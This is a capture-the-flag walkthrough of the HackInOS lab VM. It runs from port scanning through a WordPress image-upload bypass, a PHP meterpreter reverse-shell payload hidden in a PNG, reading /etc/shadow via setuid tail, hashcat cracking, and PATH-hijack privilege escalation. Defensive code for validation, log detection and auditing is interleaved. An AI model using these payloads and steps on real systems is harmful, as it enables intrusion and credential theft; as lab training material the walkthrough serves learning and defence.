1. Environment Setup
Attack machine: Kali, running in VMware in bridged mode, IP 192.168.43.48
Target: HackInOS, imported from the OVA file into VirtualBox in bridged mode. After it boots, select the Ubuntu system; since this is a simulated attack we do not log in to the target. IP 192.168.43.104
(Target download: https://download.vulnhub.com/hackinos/HackInOS.ova)
2. Information Gathering
Probe the open ports with nmap (-A enables OS and version detection, -p- scans all ports)
Command and output:
```
root@kali:~# nmap -A -p- 192.168.43.104
Starting Nmap 7.70 ( https://nmap.org ) at 2020-02-16 13:31 CST
Nmap scan report for vulnvm (192.168.43.104)
Host is up (0.00096s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA)
|   256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA)
|_  256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519)
8000/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.0.3
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 2 disallowed entries
|_/upload.php /uploads
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Blog – Just another WordPress site
MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.96 ms vulnvm (192.168.43.104)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.50 seconds
```
The scan shows that the target has port 22 (SSH) and port 8000 (HTTP) open. Port 8000 serves a WordPress blog, and robots.txt additionally reveals an upload.php file and an uploads directory.
Browse to 192.168.43.104:8000 to look at the WordPress blog.
http://192.168.43.104:8000/upload.php offers a file upload function.
3. Exploiting the File Upload Vulnerability
Viewing the page source reveals a "hint" link.
Visiting https://github.com/fatihhcelik/Vulnerable-Machine---Hint gives the source code of upload.php:
```php
<!DOCTYPE html>
<html>
<body>
<div align="center">
<form action="" method="post" enctype="multipart/form-data">
<br>
<b>Select image : </b>
<input type="file" name="file" id="file" style="border: solid;">
<input type="submit" value="Submit" name="submit">
</form>
</div>
<?php
// Check if image file is an actual image or fake image
if(isset($_POST["submit"])) {
    $rand_number = rand(1,100);
    $target_dir = "uploads/";
    $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number));
    $file_name = $target_dir . basename($_FILES["file"]["name"]);
    $uploadOk = 1;
    $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION));
    $type = $_FILES["file"]["type"];
    $check = getimagesize($_FILES["file"]["tmp_name"]);
    if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){
        $uploadOk = 1;
    }else{
        $uploadOk = 0;
        echo ":)";
    }
    if($uploadOk == 1){
        move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType);
        echo "File uploaded /uploads/?";
    }
}
?>
</body>
</html>
```
Code review shows that only PNG or GIF images are accepted, and the check is performed on the file content (in practice on the leading bytes that identify the file type: a PNG starts with 89 50 4E 47 0D 0A 1A 0A, a GIF with GIF89a).
The file extension is not checked at all. A file that passes the check is saved in the uploads directory under a randomly generated md5 name, while the extension of the uploaded file is kept unchanged.
So we can build an image shell, i.e. an image with a reverse-shell payload inside it, generated with Metasploit:
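The defect described above is that acceptance is decided by the file's magic bytes while the stored extension is copied from the client's filename. The following added example (my own code, not the upload.php from the hint repository) mirrors that logic in Python and places a hardened variant beside it: the extension is derived from the sniffed type, must agree with the client's extension, and the stored name comes from a CSPRNG instead of md5(name + rand(1,100)). The PNG/GIF signatures are the standard ones; the polyglot sample is constructed for the test.

```python
import hashlib
import os
import secrets

# Magic bytes for the two formats upload.php accepts (standard values).
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
GIF_MAGICS = (b"GIF87a", b"GIF89a")

# Constructed polyglot: a PNG signature with PHP appended, the shape of the
# image shell built later in this writeup.
POLYGLOT = PNG_MAGIC + b"\x00" * 16 + b"<?php /* constructed sample */ ?>"


def sniff_image_type(data):
    """Classify by leading bytes only: 'png', 'gif' or None."""
    if data.startswith(PNG_MAGIC):
        return "png"
    if data.startswith(GIF_MAGICS):
        return "gif"
    return None


def vulnerable_target_name(filename, data, rand_number):
    """Mirror of the page's upload.php: content decides acceptance, but the
    stored extension is copied verbatim from the user-supplied filename."""
    if sniff_image_type(data) is None:
        return None
    base = os.path.basename(filename)
    ext = os.path.splitext(base)[1].lower()          # ".php" survives here
    stem = hashlib.md5((base + str(rand_number)).encode()).hexdigest()
    return "uploads/" + stem + ext


ALLOWED_EXT = {"png": ".png", "gif": ".gif"}


def hardened_target_name(filename, data):
    """Hardened variant: the extension is derived from the sniffed type and must
    match the client's extension; the stored name is unguessable (CSPRNG)."""
    kind = sniff_image_type(data)
    if kind is None:
        return None
    user_ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if user_ext != ALLOWED_EXT[kind]:
        return None                                   # "water.php" with PNG bytes is refused
    return "uploads/" + secrets.token_hex(16) + ALLOWED_EXT[kind]
```

Two further controls that this snippet does not show, but which close the remaining gap, are storing uploads outside the document root (or with script execution disabled for that directory) and re-encoding the image with an image library so that bytes appended after the image data are dropped.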
```
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.43.48 lport=4444 -f raw
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
/*<?php /**/ error_reporting(0); $ip = '192.168.43.48'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
```
Save the generated payload to a file backdoor.php, pick any PNG image (water.png) and append backdoor.php to the end of water.png:
```
root@kali:~/baji# cat backdoor.php >> water.png
root@kali:~/baji# mv water.png water.php
```
Open Metasploit, load the exploit/multi/handler module, set the payload, listening host and listening port, and wait for the reverse shell to connect:
```
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > set lhost 192.168.43.48
lhost => 192.168.43.48
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.48:4444
```
Next, upload the image containing the backdoor.
Because the stored file name is a random md5 value, write a small script to brute-force it:
```python
import hashlib
import requests

# upload.php names the file md5(original_name + rand(1,100)) and keeps the
# extension, so there are only about 100 candidate names; request each one.
for i in range(101):
    file_name = hashlib.md5(('water.php' + str(i)).encode()).hexdigest()
    r = requests.get('http://192.168.43.104:8000/uploads/{}.php'.format(file_name))
```
On one run the script did not produce a reverse shell. Opening the image shell in Notepad showed that the first part of the payload was not being parsed as PHP, probably because of how that image file ends; switching to a different PNG solved the problem.
Run the script; Metasploit shows the reverse connection succeeding. Check the privileges with getuid.
4. Privilege Escalation
4.1 Linux privilege-escalation information gathering
Look at which files are in the directory.
Open wp-config.php: it holds the database connection details, and the database is MySQL.
sysinfo shows the system information. The hostname is 1afdd1f6b82c, which looks like a Docker container; confirming further, it is indeed running inside Docker:
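From the defender's side, the brute-force loop above leaves a distinctive trace: one client requesting many 32-hex-character .php names under /uploads/ within seconds, almost all of them 404. The following added example (my own code, not part of the original writeup) parses Apache combined-log lines and flags that pattern with a sliding time window. The log lines are constructed to imitate the loop; the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines imitating the brute-force loop:
# one client walks md5-named .php files under /uploads/, then one returns 200.
SAMPLE_LOG = """\
192.168.43.48 - - [16/Feb/2020:13:40:01 +0800] "GET /uploads/0a1b2c3d4e5f60718293a4b5c6d7e8f9.php HTTP/1.1" 404 209 "-" "python-requests/2.22.0"
192.168.43.48 - - [16/Feb/2020:13:40:01 +0800] "GET /uploads/1b2c3d4e5f60718293a4b5c6d7e8f90a.php HTTP/1.1" 404 209 "-" "python-requests/2.22.0"
192.168.43.48 - - [16/Feb/2020:13:40:02 +0800] "GET /uploads/2c3d4e5f60718293a4b5c6d7e8f90a1b.php HTTP/1.1" 404 209 "-" "python-requests/2.22.0"
192.168.43.48 - - [16/Feb/2020:13:40:02 +0800] "GET /uploads/3d4e5f60718293a4b5c6d7e8f90a1b2c.php HTTP/1.1" 200 0 "-" "python-requests/2.22.0"
192.168.43.77 - - [16/Feb/2020:13:41:10 +0800] "GET /?p=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Exactly the shape produced by upload.php: /uploads/<32 hex>.php
UPLOAD_PHP_RE = re.compile(r"^/uploads/[0-9a-f]{32}\.php$")


def parse_line(line):
    """Return (ip, timestamp, path, status) or None for an unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))


def detect_upload_bruteforce(log_text, threshold=3, window_seconds=60):
    """Return {ip: (attempts, hits)} for clients that requested at least
    `threshold` md5-named .php files under /uploads/ inside `window_seconds`.
    `hits` counts 200 responses, i.e. a stored payload that was actually run."""
    per_ip = defaultdict(list)
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec and UPLOAD_PHP_RE.match(rec[2]):
            per_ip[rec[0]].append(rec)

    alerts = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r[1])
        start = 0
        for end in range(len(recs)):          # sliding window over timestamps
            while (recs[end][1] - recs[start][1]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits = sum(1 for r in recs if r[3] == 200)
                alerts[ip] = (len(recs), hits)
                break
    return alerts
```

A hit (200) on a path in that namespace is the stronger signal: it means a file that passed the image check was executed as PHP, which is exactly what serving the uploads directory without script execution would prevent.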
```
meterpreter > run post/linux/gather/checkcontainer
[+] This appears to be a 'Docker' container
```
Upload a Linux privilege-escalation enumeration script and run it (download: https://www.securitysift.com/download/linuxprivchecker.py).
The script's output is long; reading it carefully, note that tail has the SUID bit set.
(SUID is a special permission: when a user executes a program file with SUID set, the process runs with the privileges of the file's owner. For example, if the file is owned by root, whoever runs it temporarily gains the privileges of the root account. SGID is similar, except that the process gains the privileges of the file's group.)
(The tail command displays the contents of a file. Its commonly used -f option is for watching a log file that is being written to: tail -f filename prints the end of filename on screen and keeps refreshing, so whenever filename is updated the newest content appears.
Syntax:
tail [options] [file]
Options:
- -f read in a loop (follow)
- -q do not print processing information
- -v print verbose processing information
- -c<number> number of bytes to display
- -n<lines> display the last n lines of the file
- --pid=PID used with -f: terminate after process PID dies
- -q, --quiet, --silent never output headers giving file names
- -s, --sleep-interval=S used with -f: sleep S seconds between iterations)
(/etc/shadow stores the password information of the users on a Linux system; it is also called the "shadow file". Only root has read permission and other users have no permission at all, which is what keeps the password data safe.)
4.2 Cracking the root password
Read /etc/shadow directly with tail and obtain the root user's password hash:
```
meterpreter > shell
Process 947 created.
Channel 3 created.
tail -c1G /etc/shadow
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
bin:*:17931:0:99999:7:::
sys:*:17931:0:99999:7:::
sync:*:17931:0:99999:7:::
games:*:17931:0:99999:7:::
man:*:17931:0:99999:7:::
lp:*:17931:0:99999:7:::
mail:*:17931:0:99999:7:::
news:*:17931:0:99999:7:::
uucp:*:17931:0:99999:7:::
proxy:*:17931:0:99999:7:::
www-data:*:17931:0:99999:7:::
backup:*:17931:0:99999:7:::
```
(A leading $6$ means the hash is SHA-512 crypt; the middle part $qoj6/JJi$ is the salt and FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/ is the hash itself. Likewise $1$ is MD5 crypt, $2$ is Blowfish and $5$ is SHA-256 crypt.)
Create a file root.hash containing the hash above and crack the root password with hashcat; it is john (-w 3 selects the workload profile; -a 0 is a straight dictionary attack; -m selects the hash type, and hashcat -h lists the supported types; -m 1800 is sha512crypt, the Linux SHA-512 format):
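The field layout just described ($id$salt$hash, with an optional $rounds=N$ for the SHA-crypt family) is easy to audit mechanically. The following added example (my own code, not from the writeup) parses crypt(3) password fields from shadow-style lines and reports accounts whose password field is empty or uses a weak algorithm. The root line is the one read above; the other hashed lines are constructed with dummy values of the right shape, and the weak/strong classification is my assumption.

```python
CRYPT_IDS = {
    "1": "MD5-crypt",
    "5": "SHA-256-crypt",
    "6": "SHA-512-crypt",
    "y": "yescrypt",
}
WEAK_ALGORITHMS = {"DES-crypt", "MD5-crypt"}

# Constructed /etc/shadow excerpt: the root line is the one read with tail in
# the writeup; "legacy" (dummy MD5-crypt value) and "guest" (empty field) are
# invented accounts.
SAMPLE_SHADOW = """\
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
daemon:*:17931:0:99999:7:::
legacy:$1$abcdefgh$0123456789ABCDEFGHIJKL:17931:0:99999:7:::
guest::17931:0:99999:7:::
"""


def parse_crypt_field(field):
    """Split a crypt(3) password field into its parts.
    status is 'empty', 'locked', 'malformed' or 'hashed'; hashed entries carry
    algorithm, salt, hash and (where present) rounds."""
    if field == "":
        return {"status": "empty"}
    if field.startswith(("!", "*")):
        return {"status": "locked"}
    if not field.startswith("$"):
        # traditional DES-crypt: 2-character salt followed by 11 hash characters
        return {"status": "hashed", "algorithm": "DES-crypt",
                "salt": field[:2], "hash": field[2:], "rounds": None}
    parts = field.split("$")[1:]                  # drop the empty element before the first '$'
    alg_id, rest = parts[0], parts[1:]
    if alg_id.startswith("2"):
        # bcrypt ($2$, $2a$, $2b$, $2y$): "$cost$" then 22 salt + 31 hash characters, no separator
        if len(rest) != 2:
            return {"status": "malformed"}
        return {"status": "hashed", "algorithm": "bcrypt", "rounds": int(rest[0]),
                "salt": rest[1][:22], "hash": rest[1][22:]}
    rounds = None
    if rest and rest[0].startswith("rounds="):   # optional "$rounds=N" for SHA-crypt
        rounds = int(rest[0][len("rounds="):])
        rest = rest[1:]
    if len(rest) != 2:
        return {"status": "malformed"}
    return {"status": "hashed", "algorithm": CRYPT_IDS.get(alg_id, "unknown id " + alg_id),
            "salt": rest[0], "hash": rest[1], "rounds": rounds}


def audit_shadow(text):
    """Return (user, reason) pairs for accounts whose password field is a risk."""
    findings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        user, pw = line.split(":")[:2]
        info = parse_crypt_field(pw)
        if info["status"] == "empty":
            findings.append((user, "empty password field"))
        elif info["status"] == "hashed" and info["algorithm"] in WEAK_ALGORITHMS:
            findings.append((user, "weak hash: " + info["algorithm"]))
    return findings
```

The algorithm id says nothing about the password's strength: the root entry here is SHA-512 crypt and still fell to a 4725-word list in under a minute, so the audit above complements, rather than replaces, a password policy.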
```
root@kali:~/baji# hashcat -w 3 -a 0 -m 1800 -o root.out root.hash /usr/share/metasploit-framework/data/wordlists/common_roots.txt --force
hashcat (v4.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i5-6200U CPU @ 2.30GHz, 512/1432 MB allocatable, 2MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Uses-64-Bit

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=16 -D KERN_TYPE=1800 -D _unroll'
* Device #1: Kernel m01800.013e5254.kernel not found in cache! Building may take a while...
* Device #1: Kernel amp_a0.f29ab412.kernel not found in cache! Building may take a while...
Dictionary cache built:
* Filename..: /usr/share/metasploit-framework/data/wordlists/common_roots.txt
* Passwords.: 4725
* Bytes.....: 37000
* Keyspace..: 4725
* Runtime...: 0 secs

Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: $6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvE...GHova/
Time.Started.....: Mon Feb 17 12:57:07 2020 (28 secs)
Time.Estimated...: Mon Feb 17 12:57:35 2020 (0 secs)
Guess.Base.......: File (/usr/share/metasploit-framework/data/wordlists/common_roots.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      108 H/s (66.71ms) @ Accel:256 Loops:64 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 3072/4725 (65.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 2560/4725 (54.18%)
Candidates.#1....: ihateyou -> lunita
HWMon.Dev.#1.....: N/A

Started: Mon Feb 17 12:56:11 2020
Stopped: Mon Feb 17 12:57:35 2020
root@kali:~/baji# cat root.out
$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:john
```
The john tool bundled with Kali can crack it too. I had not used it before, but a quick test also recovers the password john.
4.3 Spawning a pseudo-terminal with Python
Typing su root directly, however, gives "must be run from a terminal", so first use Python to spawn a pseudo-terminal. (Using sudo directly inside the low-privilege shell does not work either. For security reasons, Linux requires the password to be entered from a terminal device (tty) rather than from standard input (stdin). In other words, when you type the password, sudo is essentially reading the keyboard, not characters typed into bash. So to be able to enter a password we have to emulate a terminal device, and Python can do that.)
```
meterpreter > shell
Process 1484 created.
Channel 5 created.
su root
su: must be run from a terminal
python -c "import pty;pty.spawn('/bin/bash');"
www-data@1afdd1f6b82c:/var/www/html$ su root
su root
Password: john
root@1afdd1f6b82c:/var/www/html#
```
5. Exploring the Container
As usual, check the flag in /root. It is not the real flag but a hint.
During the Linux enumeration step there was also a database whose username and password we already know but have not tried. Log in to the database first and list all the tables:
```
root@1afdd1f6b82c:/var/www/html# mysql -h db -u wordpress -p wordpress
mysql -h db -u wordpress -p wordpress
Enter password: wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 70
Server version: 5.7.25 MySQL Community Server (GPL)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [wordpress]> show tables;
show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| host_ssh_cred         |
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
13 rows in set (0.01 sec)
```
There is a table named "host_ssh_cred". Its contents show a username and a password. The password looks like some kind of hash; it is 32 characters long, so presumably an md5 value, and an online lookup gives the plaintext "123456":
```
MySQL [wordpress]> select * from host_ssh_cred;
select * from host_ssh_cred;
+-------------------+----------------------------------+
| id                | pw                               |
+-------------------+----------------------------------+
| hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e |
+-------------------+----------------------------------+
1 row in set (0.05 sec)
```
6. SSH Connection
From the attack machine, log in to port 22 on the target with this username and password; the login succeeds:
```
root@kali:~# ssh hummingbirdscyber@192.168.43.104
The authenticity of host '192.168.43.104 (192.168.43.104)' can't be established.
ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.43.104' (ECDSA) to the list of known hosts.
hummingbirdscyber@192.168.43.104's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-29-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
0 updates are security updates.

*** System restart required ***
Last login: Fri Mar  1 23:58:08 2019 from 192.168.1.31
hummingbirdscyber@vulnvm:~$
```
This user name looks like it belongs to the docker group; checking confirms that it does.
With docker privileges we can read the files under /root (-i keeps stdin open so input and output go through the console; -t allocates a tty; -v mounts a host path into the container; the command starts a container from the ubuntu image in interactive mode and runs /bin/bash inside it, with the host's / mounted at /root in the container). But an error occurred; searching suggests a mismatch between the docker version and the system, which I could not resolve. Once the mount succeeds, the flag can be found at /root/flag.
```
hummingbirdscyber@vulnvm:~$ docker run -it -v /:/root ubuntu /bin/bash
docker: Error response from daemon: failed to start shim: exec: "docker-containerd-shim": executable file not found in $PATH: unknown.
```
7. Escalating Privileges Again
Since we did not get the flag, "hummingbirdscyber" is evidently also a low-privilege account. There are write-ups online describing escalation through command hijacking, so let's try that.
First enumerate every binary with the SUID bit set. A very odd entry, "/home/hummingbirdscyber/Desktop/a.out", stands out:
```
hummingbirdscyber@vulnvm:~$ ls -lh $(find / -perm -u=s -type f 2>/dev/null)
-rwsr-xr-x 1 root root        31K Tem 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root        40K May 16  2018 /bin/mount
-rwsr-xr-x 1 root root        44K May  7  2014 /bin/ping
-rwsr-xr-x 1 root root        44K May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root        40K May 17  2017 /bin/su
-rwsr-xr-x 1 root root        27K May 16  2018 /bin/umount
-rwsr-xr-x 1 root root       8,6K Mar  1  2019 /home/hummingbirdscyber/Desktop/a.out
-rwsr-xr-x 1 root root        49K May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root        40K May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root        74K May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root        39K May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root        53K May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root        23K Mar 27  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root       134K Oca 31 21:37 /usr/bin/sudo
-rwsr-xr-- 1 root messagebus  42K Haz 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root        10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root       419K Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root        15K Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root        97K Mar 18  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root        19K Mar 18  2017 /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
-rwsr-sr-x 1 root root        11K Eki 25  2018 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root dip        386K Haz 12  2018 /usr/sbin/pppd
```
Running a.out prints root, and strings on it also shows whoami, so presumably the program runs with root privileges and calls system("whoami"). Therefore we can find a way to replace the whoami command on the machine with one that runs system("/bin/bash").
Check the PATH entries.
First write our own whoami source whose only job is to run a shell, compile it into an executable named whoami, create a bin directory and put whoami in it, then run a.out to escalate. This succeeds and yields the flag.
```c
#include <stdlib.h>

int main(void) {
    system("/bin/bash");
    return 0;
}
```
```
hummingbirdscyber@vulnvm:~$ vi whoami.c
hummingbirdscyber@vulnvm:~$ gcc whoami.c -o whoami
hummingbirdscyber@vulnvm:~$ mkdir bin
hummingbirdscyber@vulnvm:~$ mv whoami bin/
hummingbirdscyber@vulnvm:~$ Desktop/a.out
root@vulnvm:~# cat /root/flag
Congratulations!
-ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. `
root@vulnvm:~#
```
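Both root paths in this section (the setuid tail in the container and the setuid a.out that runs a bare whoami through the caller's PATH) are things a host audit can surface before anyone exploits them. The following added example (my own code, not part of the writeup) parses `ls -l` style lines such as the listing above, flags setuid/setgid binaries outside the system directories and setuid copies of generic file readers, and lists PATH entries the caller can populate. The listing is a constructed excerpt of the output above plus an invented setuid tail line and an invented non-setuid line; the trusted prefixes and reader list are assumptions.

```python
# Constructed excerpt of the `ls -lh $(find / -perm -u=s ...)` output above,
# plus an invented setuid /usr/bin/tail (as found in the container) and an
# invented non-setuid /bin/bash line to show that plain binaries are skipped.
SAMPLE_LS = """\
-rwsr-xr-x 1 root root 40K May 17 2017 /bin/su
-rwsr-xr-x 1 root root 8,6K Mar 1 2019 /home/hummingbirdscyber/Desktop/a.out
-rwsr-xr-- 1 root messagebus 42K Haz 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 97K Mar 18 2019 /usr/lib/snapd/snap-confine
-rwxr-xr-x 1 root root 1,0M Jan 1 2019 /bin/bash
-rwsr-xr-x 1 root root 67K Jan 1 2019 /usr/bin/tail
"""

# Assumed: setuid binaries are expected only under these prefixes.
TRUSTED_PREFIXES = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/")
# Generic file readers/editors that expose root-only files (e.g. /etc/shadow) when setuid.
FILE_READERS = {"tail", "head", "cat", "less", "more", "cp", "vi", "vim", "nano"}


def parse_ls_line(line):
    """Parse one `ls -l` line. The date is always three tokens, so the path is
    the ninth whitespace-separated field (it may itself contain spaces)."""
    mode, _links, owner, group, _size, _d1, _d2, _d3, path = line.split(None, 8)
    return {"mode": mode, "owner": owner, "group": group, "path": path,
            "suid": mode[3] in "sS", "sgid": mode[6] in "sS"}


def audit_suid(listing):
    """Return (path, reason) pairs for setuid/setgid binaries worth a second look."""
    findings = []
    for line in listing.splitlines():
        if not line.strip():
            continue
        e = parse_ls_line(line)
        if not (e["suid"] or e["sgid"]):
            continue
        name = e["path"].rsplit("/", 1)[-1]
        if not e["path"].startswith(TRUSTED_PREFIXES):
            findings.append((e["path"], "setuid/setgid binary outside system directories"))
        elif name in FILE_READERS:
            findings.append((e["path"], "setuid file reader exposes root-only files"))
    return findings


def writable_path_entries(path_env, home):
    """PATH entries the caller of a setuid program can populate: empty or
    relative entries and anything under the caller's home directory. A setuid
    program that calls system("whoami") resolves the command through these."""
    risky = []
    home_prefix = home.rstrip("/") + "/"
    for entry in path_env.split(":"):
        if entry == "" or not entry.startswith("/") or entry.startswith(home_prefix):
            risky.append(entry)
    return risky
```

The corresponding fix on the program side is for a privileged binary to invoke helpers by absolute path (or reset PATH itself) rather than inherit the caller's environment; the audit above is how a defender finds the binaries that do not.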
8. Summary
Three privilege-escalation techniques were exercised on this machine:
1. Using a SUID executable to perform operations as root
2. Escalating through docker group privileges
3. Escalating through the environment (PATH hijacking)
References:
https://blog.csdn.net/wn314/article/details/90523507
https://www.freebuf.com/column/218556.html